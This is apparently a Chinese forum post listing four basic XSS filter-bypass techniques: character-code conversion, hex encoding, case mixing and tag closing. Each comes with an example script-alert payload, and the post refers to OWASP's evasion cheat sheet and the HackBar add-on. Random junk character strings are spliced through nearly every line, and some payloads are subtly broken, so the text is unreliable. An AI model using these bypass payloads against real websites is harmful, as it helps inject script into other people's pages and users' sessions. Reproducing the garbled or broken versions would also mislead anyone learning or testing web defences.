四种超级基础的绕过方法。. I7 p3 o+ G1 B, f1 \" @1 ]; \
1.转换为ASCII码, ?+ k, L5 W0 ], S2 a; l
例子:原脚本为<script>alert(‘I love F4ck’)</script >
1 T2 D7 E" i6 R/ ^通过转换,变成:9 S0 ~. w- i9 X" _9 S$ F3 [2 Q
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>: D( m& C( v R5 {7 X' f' T) E+ }' N
) J* ?! e+ V4 V9 {9 C9 ~
2.转换为HEX(十六进制)' N/ Y+ V' e: o9 e3 L( S ]
例子:原脚本为<script>alert(‘I love F4ck’)</script>
, R5 {0 W' U# J通过转换,变成:5 r7 `! \4 C+ D5 |# p5 \
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
8 i/ ]# y/ ?9 ?2 }( P& d 9 a- G% {+ x: C- S3 y
3.转换脚本的大小写 y, \: y9 @, ~7 ]. G
例子:原脚本为<script>alert(‘I love F4ck’)</script>% ?! c) R5 v0 _8 C
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
3 N0 F/ V+ p$ }. ^ Z4 c# Y' P+ X3 @3 z
4.增加闭合标记”>5 H; s- I) O4 h) p6 D
例子:原脚本为<script>alert(‘I love F4ck’)</script>
2 | R9 Z+ E$ r3 T/ F5 s$ j0 S* X转换为:”><script>alert(‘I love F4ck’)</script>; J$ P" a* |& z9 d+ b+ `
更详细绕过技术请参考此网页
+ v: Q$ c# L- h' F9 k- P% D( T khttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
9 x/ S3 Q' h3 L, N: q1 _" I ) R: u$ o! [- A" b
转换工具使用的是火狐的 hackbar mozilla addon. |